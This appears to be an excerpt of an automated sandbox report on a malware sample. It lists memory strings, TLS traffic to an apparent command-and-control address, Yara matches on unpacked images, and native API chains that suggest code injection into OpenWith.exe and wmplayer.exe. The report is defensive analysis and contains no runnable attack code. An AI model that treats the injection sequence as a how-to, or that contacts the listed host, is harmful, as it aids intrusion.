Source: OpenWith.exe, 0000000F.00000003.2076605269.000001F0D7644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: OpenWith.exe, 0000000F.00000003.2077419633.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5a
Source: OpenWith.exe, 0000000F.00000003.2078142726.000001F0D73A6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2076758664.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: OpenWith.exe, 0000000F.00000003.2076758664.000001F0D7394000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17A66
Source: OpenWith.exe, 0000000F.00000003.2076605269.000001F0D7644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: OpenWith.exe, 0000000F.00000002.2321311463.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2230586542.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2081434576.000001F0D7371000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2265431962.000001F0D7371000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2107281075.000001F0D7374000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2109142807.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2116414121.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2256683034.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17N-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP
Source: OpenWith.exe, 0000000F.00000003.2076758664.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t.mc_id=EnterPK201694ba2e0b-6
Source: nF54KOU30R.exe, 00000000.00000003.1915931292.0000000001013000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website~e
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49750 version: TLS 1.2

Source: dialer.exe, 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: DirectInput8Create

memstr_d5bbd631-1

Source: dialer.exe, 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_3f489398-6

Source: Yara match	File source: 5.3.dialer.exe.4bb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.dialer.exe.4bb0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.dialer.exe.4bb0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.dialer.exe.4dd0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.dialer.exe.4bb0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dialer.exe PID: 8032, type: MEMORYSTR

Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_000001F0D55130C7 RtlAllocateHeap,RtlAllocateHeap,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,RtlDeleteBoundaryDescriptor,RtlDeleteBoundaryDescriptor,	15_3_000001F0D55130C7
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E575A540 NtAcceptConnectPort,	15_3_00007DF4E575A540
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E575A600 NtAcceptConnectPort,	15_3_00007DF4E575A600
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E575B154 NtAcceptConnectPort,NtAcceptConnectPort,	15_3_00007DF4E575B154
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E575B088 NtAcceptConnectPort,NtAcceptConnectPort,	15_3_00007DF4E575B088
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E575A2B0 NtAcceptConnectPort,	15_3_00007DF4E575A2B0
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E57592CC NtAcceptConnectPort,DuplicateHandle,NtAcceptConnectPort,??3@YAXPEAX@Z,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,	15_3_00007DF4E57592CC
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5758C90 NtAcceptConnectPort,	15_3_00007DF4E5758C90
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5759CA0 _calloc_dbg,NtAcceptConnectPort,	15_3_00007DF4E5759CA0
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5758C08 NtAcceptConnectPort,	15_3_00007DF4E5758C08
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5759F40 NtAcceptConnectPort,	15_3_00007DF4E5759F40
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5758D74 NtAcceptConnectPort,	15_3_00007DF4E5758D74
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5758D94 NtAcceptConnectPort,	15_3_00007DF4E5758D94
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5759AF4 _malloc_dbg,NtAcceptConnectPort,NtAcceptConnectPort,??3@YAXPEAX@Z,	15_3_00007DF4E5759AF4
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5758AFC NtAcceptConnectPort,	15_3_00007DF4E5758AFC
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5758A40 NtAcceptConnectPort,	15_3_00007DF4E5758A40
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_2_000001F0D53B1A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler,	15_2_000001F0D53B1A90
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_2_000001F0D53B0AC8 NtAcceptConnectPort,NtAcceptConnectPort,	15_2_000001F0D53B0AC8
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_2_000001F0D53B15AC NtAcceptConnectPort,	15_2_000001F0D53B15AC
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_2_000001F0D53B1CD0 RtlAllocateHeap,NtAcceptConnectPort,FindCloseChangeNotification,	15_2_000001F0D53B1CD0
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_3_00007DF445C31CE8 _calloc_dbg,CreateProcessW,NtResumeThread,FindCloseChangeNotification,??3@YAXPEAX@Z,	16_3_00007DF445C31CE8
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_3_00007DF445C31958 _calloc_dbg,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,	16_3_00007DF445C31958
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_0000020343292508 NtAcceptConnectPort,	16_2_0000020343292508
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432923F4 NtAcceptConnectPort,	16_2_00000203432923F4
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_0000020343292C40 NtAcceptConnectPort,	16_2_0000020343292C40
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432929B0 NtAcceptConnectPort,	16_2_00000203432929B0
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432928C4 NtAcceptConnectPort,	16_2_00000203432928C4
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_000002034329296C NtAcceptConnectPort,	16_2_000002034329296C
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_0000020343292894 NtAcceptConnectPort,	16_2_0000020343292894
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_0000020343292868 NtAcceptConnectPort,	16_2_0000020343292868
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_0000020343292794 NtAcceptConnectPort,	16_2_0000020343292794
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00007DF445C52704 NtQuerySystemInformation,_malloc_dbg,NtQuerySystemInformation,	16_2_00007DF445C52704
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5A385C NtQuerySystemInformation,	17_2_000001D3CF5A385C

Source: C:\Users\user\Desktop\nF54KOU30R.exe	Code function: 0_3_03DB0AA0	0_3_03DB0AA0
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_000001F0D5514A38	15_3_000001F0D5514A38
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_000001F0D5512C3C	15_3_000001F0D5512C3C
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_000001F0D55124F7	15_3_000001F0D55124F7
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_000001F0D5515E7C	15_3_000001F0D5515E7C
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_000001F0D551557C	15_3_000001F0D551557C
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_000001F0D55158FC	15_3_000001F0D55158FC
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_000001F0D5511BA6	15_3_000001F0D5511BA6
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_000001F0D551279C	15_3_000001F0D551279C
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5767318	15_3_00007DF4E5767318
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5745BD8	15_3_00007DF4E5745BD8
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E574BEC4	15_3_00007DF4E574BEC4
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E579F4FC	15_3_00007DF4E579F4FC
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5788534	15_3_00007DF4E5788534
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E57AA3F4	15_3_00007DF4E57AA3F4
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E58293FC	15_3_00007DF4E58293FC
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E573E414	15_3_00007DF4E573E414
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E577C45C	15_3_00007DF4E577C45C
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E58173A0	15_3_00007DF4E58173A0
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E58183B8	15_3_00007DF4E58183B8
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E58246F8	15_3_00007DF4E58246F8
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5818750	15_3_00007DF4E5818750
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E574D688	15_3_00007DF4E574D688
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E57CB68C	15_3_00007DF4E57CB68C
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E57D40A0	15_3_00007DF4E57D40A0
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E579B094	15_3_00007DF4E579B094
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E580C01C	15_3_00007DF4E580C01C
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5796F78	15_3_00007DF4E5796F78
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5786FA0	15_3_00007DF4E5786FA0
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5743314	15_3_00007DF4E5743314
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E577D210	15_3_00007DF4E577D210
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5818238	15_3_00007DF4E5818238
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E58111BC	15_3_00007DF4E58111BC
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E58241DC	15_3_00007DF4E58241DC
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5817CF4	15_3_00007DF4E5817CF4
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5731BFC	15_3_00007DF4E5731BFC
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5740C44	15_3_00007DF4E5740C44
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E575EC44	15_3_00007DF4E575EC44
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5788BE8	15_3_00007DF4E5788BE8
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E57A6F20	15_3_00007DF4E57A6F20
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E581CF3C	15_3_00007DF4E581CF3C
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5829F40	15_3_00007DF4E5829F40
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E577CEC4	15_3_00007DF4E577CEC4
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5789E68	15_3_00007DF4E5789E68
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5813DE0	15_3_00007DF4E5813DE0
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E577F954	15_3_00007DF4E577F954
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E58158AC	15_3_00007DF4E58158AC
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E58178D8	15_3_00007DF4E58178D8
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E580780C	15_3_00007DF4E580780C
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5796834	15_3_00007DF4E5796834
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E574D850	15_3_00007DF4E574D850
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5787860	15_3_00007DF4E5787860
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E57577A0	15_3_00007DF4E57577A0
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E57717C4	15_3_00007DF4E57717C4
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E577C7E8	15_3_00007DF4E577C7E8
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5796B20	15_3_00007DF4E5796B20
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5796A10	15_3_00007DF4E5796A10
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5734A14	15_3_00007DF4E5734A14
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5784A14	15_3_00007DF4E5784A14
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E578A9C4	15_3_00007DF4E578A9C4
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_2_000001F0D53B0C5C	15_2_000001F0D53B0C5C
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_3_00007DF445C34EFC	16_3_00007DF445C34EFC
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_3_00007DF445C3392C	16_3_00007DF445C3392C
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_3_00007DF445C32204	16_3_00007DF445C32204
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_0000020343292D00	16_2_0000020343292D00
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_000002034328C254	16_2_000002034328C254
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_000002034328262C	16_2_000002034328262C
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432814D0	16_2_00000203432814D0
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432A6CE0	16_2_00000203432A6CE0
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432BECAC	16_2_00000203432BECAC
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_000002034329DCB4	16_2_000002034329DCB4
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432C0D58	16_2_00000203432C0D58
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432B959C	16_2_00000203432B959C
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432B5578	16_2_00000203432B5578
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432BCBBC	16_2_00000203432BCBBC
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432C63FC	16_2_00000203432C63FC
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432B0440	16_2_00000203432B0440
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_0000020343295AAC	16_2_0000020343295AAC
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_000002034329E368	16_2_000002034329E368
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432B4A18	16_2_00000203432B4A18
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432C3A15	16_2_00000203432C3A15
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432B3A00	16_2_00000203432B3A00
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_0000020343297240	16_2_0000020343297240
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432C0238	16_2_00000203432C0238
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432B58E0	16_2_00000203432B58E0
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432BF908	16_2_00000203432BF908
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432BE94C	16_2_00000203432BE94C
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432A0144	16_2_00000203432A0144
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432BF198	16_2_00000203432BF198
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_000002034329CFE0	16_2_000002034329CFE0
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432AD81C	16_2_00000203432AD81C
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432BA7E4	16_2_00000203432BA7E4
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432A705C	16_2_00000203432A705C
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432C083C	16_2_00000203432C083C
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432B4898	16_2_00000203432B4898
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_000002034329C720	16_2_000002034329C720
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_0000020343296EF4	16_2_0000020343296EF4
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432B3F38	16_2_00000203432B3F38
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432B4DB0	16_2_00000203432B4DB0
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_000002034329F5E8	16_2_000002034329F5E8
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432A764C	16_2_00000203432A764C
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432B5E90	16_2_00000203432B5E90
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_000002034329BE88	16_2_000002034329BE88
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432A3E6C	16_2_00000203432A3E6C
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00000203432A867C	16_2_00000203432A867C
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_00007DF445C422CC	16_2_00007DF445C422CC
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5B8EB8	17_2_000001D3CF5B8EB8
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5BF76C	17_2_000001D3CF5BF76C
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5C25B4	17_2_000001D3CF5C25B4
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5AC5D4	17_2_000001D3CF5AC5D4
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5CC668	17_2_000001D3CF5CC668
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5C4660	17_2_000001D3CF5C4660
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5BAE10	17_2_000001D3CF5BAE10
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5D1E08	17_2_000001D3CF5D1E08
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5AD604	17_2_000001D3CF5AD604
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5A8DF4	17_2_000001D3CF5A8DF4
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5CC500	17_2_000001D3CF5CC500
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5BA4F8	17_2_000001D3CF5BA4F8
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5B9D30	17_2_000001D3CF5B9D30
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5BE51C	17_2_000001D3CF5BE51C
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5B53C8	17_2_000001D3CF5B53C8
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5A737C	17_2_000001D3CF5A737C
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5ABC68	17_2_000001D3CF5ABC68
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5B92D4	17_2_000001D3CF5B92D4
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5C2AA0	17_2_000001D3CF5C2AA0
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5C3B40	17_2_000001D3CF5C3B40
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5B8980	17_2_000001D3CF5B8980
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5B9998	17_2_000001D3CF5B9998
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5C2254	17_2_000001D3CF5C2254
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5C3210	17_2_000001D3CF5C3210
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5C4144	17_2_000001D3CF5C4144
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5ABFE4	17_2_000001D3CF5ABFE4
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5B27A4	17_2_000001D3CF5B27A4
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5BA860	17_2_000001D3CF5BA860
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5B9818	17_2_000001D3CF5B9818

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 516

Source: nF54KOU30R.exe, 00000000.00000002.1982649519.0000000003B60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTCPZ.exe, vs nF54KOU30R.exe
Source: nF54KOU30R.exe, 00000000.00000002.1982577509.00000000039C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTCPZ.exe, vs nF54KOU30R.exe
Source: nF54KOU30R.exe, 00000000.00000003.1979370491.0000000003DCB000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTCPZ.exe, vs nF54KOU30R.exe

Source: nF54KOU30R.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 15.3.OpenWith.exe.1f0d742aad0.20.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.27.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.6.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.11.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
